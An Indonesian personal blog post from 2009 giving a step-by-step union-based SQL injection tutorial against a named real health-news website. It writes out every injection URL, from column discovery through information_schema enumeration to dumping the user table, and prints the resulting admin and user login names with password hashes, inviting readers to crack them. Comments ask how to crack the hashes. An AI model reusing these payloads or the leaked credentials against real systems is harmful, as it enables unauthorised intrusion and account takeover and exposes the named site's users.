Monday, 2026-07-27, 6:10 PM
Herman's Site Welcome to my home page
Politeknik Santo Thomas Medan
menerima mahasiswa/i baru TA 2009/2010.
  • Klik disini
  • Section categories
    wireless [1]
    Network [1]
    Mikrotik [4]
    Catatan Kecil [1]
    Seberkas catatan pengalaman
    Program VB [1]
    Program
    My Diary [2]
    Hitam & Terang ku
    Curhat [6]
    Curhat
    Hacking [11]
    Hacking
    lagu [5]
    Nama:
    Alamat Email/Web:
    Pesan:
    :) :( :D :p :(( :)) :x
    Entries archive
      
    Main » 2009 » March » 2 » SQL INJEKTION
    SQL INJEKTION
    7:09 PM

    SQL INJEKTION

    contoh target kita kali ini dari dalam negeri ajah ya... :)

    http://www.solusisehat.net/berita.php?id=227

    keluarin magic numbernya

    http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--

    angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number

    sekarang coba kita liat versi, database dan user dari target

    http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7--

    nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :)

    sekarang kita liat table2 yang ada didalam databasenya

    disini gw make command information_schema untuk ngeluarin table sama columnnya.

    http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()--

    command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database()

    masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya

    kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya

    nah keliatan semua table yang ada dalam databasenya kan?

    disini kita hanya akan mencari loginnya ajah ya...

    diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user

    sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572

    http://www.paulschou.com/tools/xlate/ <-- konvertnya disini

    lalu kita keluarin columnnya

    http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--

    command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]

    [nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572

    group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572

    nah disini kita bisa liat column yang ada dalam table ssc_user

    sekarang kita akan ngeluarin informasi dari column nama_login dan sandi

    http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--

    admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc

    sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?

    tinggal dicrack ajah deh xixixi.. :)
    Category: Hacking | Views: 755 | Added by: herman | Rating: 0.0/0 |
    Total comments: 6
    6 admin  
    0
    @budi: saya juga bingung pak.. aneh tuh, blun tau saya gmana crack gituan..
    @breres : sda mas
    @Furkan: saya yang tau versi 5 mas.

    5 Budi  
    0
    cracknya pake apa nich

    4 Budi  
    0
    untuk passnya diDescrypt/ encrypt pake apa ya

    3 breres  
    0
    o iya
    balas ke email saya jg yah
    he_doank@telkom.net

    2 breres  
    0
    bro... pass na itu di encrypt pake apa yah?

    1 Furkan  
    0
    Masih Gk ngerti yang gituan nehhh, klo versi2na beda beda juga trus gimana carana yahh

    Only registered users can add comments.
    [ Registration | Login ]
    Calendar
    «  March 2009  »
    Su Mo Tu We Th Fr Sa
    1234567
    891011121314
    15161718192021
    22232425262728
    293031
    Statistics

    Total online: 1
    Guests: 1
    Users: 0
    Search
    Site friends
  • My Facebook
  • Andi LP3I
  • Mas Edri
  • Alumni St.Thomas
  • Politeknik St.Thomas
  • (nieh site kampus sapa yang buat sieh??)
    IP
    Jumlah pengunjung:
    buy viagra counter
    Copyright© 2026 Powered by Herman Silalahi